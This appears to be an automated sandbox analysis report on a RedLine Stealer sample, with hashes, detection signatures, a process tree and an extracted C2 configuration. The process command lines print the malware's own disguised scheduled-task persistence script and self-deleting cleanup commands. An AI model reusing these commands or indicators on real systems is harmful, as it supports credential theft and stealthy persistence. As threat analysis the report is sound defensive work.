Edit tour
Windows
Analysis Report
18561381.exe
Overview
General Information
| Sample Name: | 18561381.exe |
| Analysis ID: | 591720 |
| MD5: | 68e9a902193c06e8f3289cd54fdac054 |
| SHA1: | 1998a855c46aac49ee9974e0f6277f2fffd396e5 |
| SHA256: | 0f0807cdcb400a718656d3ec845ad57ffef9e25232d50044bb8d7a5d9d2a0a98 |
| Tags: | exeRedLineStealer |
| Infos: |   |
 | |
Detection
RedLine
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Yara detected RedLine Stealer
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Sigma detected: Suspicious Script Execution From Temp Folder
Query firmware table information (likely to detect VMs)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Hides that the sample has been downloaded from the Internet (zone.identifier)
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Tries to steal Crypto Currency Wallets
Command shell drops VBS files
Changes security center settings (notifications, updates, antivirus, firewall)
Obfuscated command line found
PE file has nameless sections
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Del in CommandLine
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Sigma detected: Cscript Visual Basic Script Execution
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Yara detected Credential Stealer
IP address seen in connection with other malware
Enables debug privileges
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Uses taskkill to terminate processes
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries disk information (often used to detect virtual machines)
Classification
- System is w10x64
18561381.exe (PID: 6608 cmdline: "C:\Users\ user\Deskt op\1856138 1.exe" MD5: 68E9A902193C06E8F3289CD54FDAC054) - build.exe (PID: 2856 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\build. exe" MD5: D1DB0A92A4C72B887CC16A32E9D285A8) 
cmd.exe (PID: 5612 cmdline: C:\Windows \System32\ cmd.exe" / c "C:\User s\user\App Data\Roami ng\Microso ft\Securit y\Windows Security.e xe MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5604 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - Windows Security.exe (PID: 4312 cmdline:
C:\Users\u ser\AppDat a\Roaming\ Microsoft\ Security\W indows Sec urity.exe MD5: D1DB0A92A4C72B887CC16A32E9D285A8) - cmd.exe (PID: 6780 cmdline:
"C:\Window s\System32 \cmd.exe" /c @echo o ff & echo const Trig gerTypeLog on=9 : con st ActionT ypeExecuta ble=0 : co nst TASK_L OGON_INTER ACTIVE_TOK EN=3 : con st createO rUpdateTas k=6 : Set service=Cr eateObject ("Schedule .Service") : call se rvice.Conn ect() : Di m rootFold er : Set r ootFolder= service.Ge tFolder("" ) : Dim ta skDefiniti on : Set t askDefinit ion=servic e.NewTask( 0) : Dim r egInfo : S et regInfo =taskDefin ition.Regi strationIn fo : regIn fo.Author= "Microsoft Corporati on" : regI nfo.Descri ption="Win dows Secur ity is a s oftware ap plication that safeg uards a sy stem from malware. I t was an a nti-spywar e program built to f ight unaut horized ac cess and p rotect Win dows compu ters from unwanted s oftware." : Dim sett ings : Set settings= taskDefini tion.Setti ngs : sett ings.Start WhenAvaila ble=True : settings. ExecutionT imeLimit=" PT0S" : se ttings.All owHardTerm inate=Fals e : settin gs.IdleSet tings.Stop OnIdleEnd= False : se ttings.Dis allowStart IfOnBatter ies=False : settings .StopIfGoi ngOnBatter ies=False : Dim trig gers : Set triggers= taskDefini tion.Trigg ers : Dim trigger : Set trigge r=triggers .Create(Tr iggerTypeL ogon) : us erId=Creat eObject("W Script.She ll").Expan dEnvironme ntStrings( "%USERNAME %") : trig ger.Id="Lo gonTrigger Id" : trig ger.UserId =userId : Dim Action : Set Act ion=taskDe finition.A ctions.Cre ate(Action TypeExecut able) : Ac tion.Path= "C:\Users\ user\AppDa ta\Roaming \Microsoft \Security\ Windows Se curity.exe " : taskDe finition.P rincipal.U serId=user Id : taskD efinition. Principal. LogonType= TASK_LOGON _INTERACTI VE_TOKEN : call root Folder.Reg isterTaskD efinition( "Windows S ecurity", taskDefini tion, crea teOrUpdate Task, Empt y, Empty, TASK_LOGON _INTERACTI VE_TOKEN) > C:\Users \user\AppD ata\Local\ Temp\tmpBD 82.vbs & c script //n ologo C:\U sers\user\ AppData\Lo cal\Temp\t mpBD82.vbs & del C:\ Users\user \AppData\L ocal\Temp\ tmpBD82.vb s /f /q & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6772 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) 
cscript.exe (PID: 2212 cmdline: cscript // nologo C:\ Users\user \AppData\L ocal\Temp\ tmpBD82.vb s MD5: 956185CAF895737F30E8EE24DEFCE8E6) - cmd.exe (PID: 2368 cmdline:
"C:\Window s\System32 \cmd.exe" /c taskkil l /F /PID 2856 & pow ershell -c ommand "$E rrorAction Preference = 'silentl ycontinue' ; (Get-Wmi Object Win 32_Process | Where-O bject { $_ .Path.Star tsWith('C: \Users\use r\AppData\ Local\Temp \build.exe ') }).Term inate()" & timeout 3 > nul & d el /F /S / Q /A "C:\U sers\user\ AppData\Lo cal\Temp\b uild.exe" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6008 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - taskkill.exe (PID: 6156 cmdline:
taskkill / F /PID 285 6 MD5: 530C6A6CBA137EAA7021CEF9B234E8D4) 
powershell.exe (PID: 4880 cmdline: powershell -command "$ErrorAct ionPrefere nce= 'sile ntlycontin ue'; (Get- WmiObject Win32_Proc ess | Wher e-Object { $_.Path.S tartsWith( 'C:\Users\ user\AppDa ta\Local\T emp\build. exe') }).T erminate() " MD5: 95000560239032BC68B4C2FDFCDEF913) - timeout.exe (PID: 5340 cmdline:
timeout 3 MD5: EB9A65078396FB5D4E3813BB9198CB18)
- svchost.exe (PID: 7108 cmdline:
c:\windows \system32\ svchost.ex e -k netwo rkservice -p -s DoSv c MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 7156 cmdline:
C:\Windows \System32\ svchost.ex e -k Netwo rkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 2084 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- SgrmBroker.exe (PID: 5524 cmdline:
C:\Windows \system32\ SgrmBroker .exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
- svchost.exe (PID: 4816 cmdline:
c:\windows \system32\ svchost.ex e -k local servicenet workrestri cted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA) 
MpCmdRun.exe (PID: 5532 cmdline: "C:\Progra m Files\Wi ndows Defe nder\mpcmd run.exe" - wdenable MD5: A267555174BFA53844371226F482B86B) - conhost.exe (PID: 5528 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- svchost.exe (PID: 4972 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 6152 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 6924 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1972 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 4504 cmdline:
C:\Windows \system32\ svchost.ex e -k wusvc s -p -s Wa aSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
- Windows Security.exe (PID: 4336 cmdline:
C:\Users\u ser\AppDat a\Roaming\ Microsoft\ Security\W indows Sec urity.exe MD5: D1DB0A92A4C72B887CC16A32E9D285A8)
- cleanup
{"C2 url": ["65.108.82.103:15914"], "Bot Id": "@JABKA9983", "Authorization Header": "3da459a4f4fcd6fe99288a78b3680c31"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
| MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
| JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
| JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
| MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
| |
| JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
| MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
|
System Summary |   |
|---|
| Source: | Author: Florian Roth, Max Altgelt: | ||
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: | ||
| Source: | Author: frack113: | ||
| Source: | Author: frack113: | ||
| Source: | Author: frack113: | ||
| Source: | Author: frack113: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
| Source: | Author: frack113: | ||
| Source: | Author: frack113: | ||
| Source: | Author: frack113: | ||
| Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): | ||
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Malware Configuration Extractor: | ||
| Source: | Virustotal: | Perma Link | ||
| Source: | ReversingLabs: | |||
| Source: | Avira: | ||
| Source: | Metadefender: | Perma Link | ||
| Source: | ReversingLabs: | |||
| Source: | Metadefender: | Perma Link | ||
| Source: | ReversingLabs: | |||
| Source: | Joe Sandbox ML: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Static PE information: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Static PE information: | ||
| Source: | Key opened: | ||
| Source: | Key opened: | ||
| Source: | Key opened: | ||
| Source: | Key opened: | ||
| Source: | Key opened: | ||
| Source: | Key opened: | ||
| Source: | Key opened: | ||
| Source: | Key opened: | ||
| Source: | Key opened: | ||
| Source: | Key opened: | ||
| Source: | Key opened: | ||
| Source: | Key opened: | ||
| Source: | Key opened: | ||
| Source: | Key opened: | ||
| Source: | Key opened: | ||
| Source: | Key opened: | ||
| Source: | JA3 fingerprint: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||